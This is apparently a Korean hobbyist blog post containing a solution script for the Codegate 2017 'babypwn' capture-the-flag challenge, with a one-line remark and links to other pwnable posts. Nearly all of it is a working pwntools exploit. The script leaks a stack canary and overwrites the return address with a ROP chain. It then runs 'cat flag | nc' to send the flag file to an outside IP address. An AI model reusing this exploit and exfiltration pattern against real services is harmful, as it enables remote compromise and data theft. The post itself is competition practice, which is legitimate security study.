cdor1's lab
Codegate 2017 babypwn 본문
후기 : 첫 소켓 프로그램 익스플로잇.
fd때문에 애먹었다.
from pwn import *
#s = remote('localhost', 8181)
s = remote('110.10.212.130', 8888)
print s.recvuntil('Select menu > ')
s.sendline('1')
print s.recvuntil('Input Your Message : ')
s.sendline('a'*40)
print s.recvuntil('a'*40 + '\n')
canary = u32('\x00' + s.recv(3))
log.info('canary : ' + hex(canary))
raw_input()
print s.recvuntil('Select menu > ')
s.sendline('1')
print s.recvuntil('Input Your Message : ')
payload = 'A'*40
payload += p32(canary)
payload += 'A'*12
payload += p32(0x080486E0)
payload += p32(0x08048EEC)
payload += p32(4)
payload += p32(0x0804b1b4)
payload += p32(100)
payload += p32(0)
payload += p32(0x08048620)
payload += 'AAAA'
payload += p32(0x0804b1b4)
s.sendline(payload)
print s.recvuntil('Select menu > ')
s.sendline('3')
s.sendline('cat flag | nc 52.199.49.117 8888')
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| openCTF 2016 tyro_heap (0) | 2017.02.14 |
|---|---|
| pwnable.kr unlink (0) | 2017.02.13 |
| codegate 2차 발표자료 (0) | 2017.02.09 |
| pwnable.tw hacknote (0) | 2017.01.26 |
| Codegate2016 발표준비 (0) | 2017.01.25 |
Comments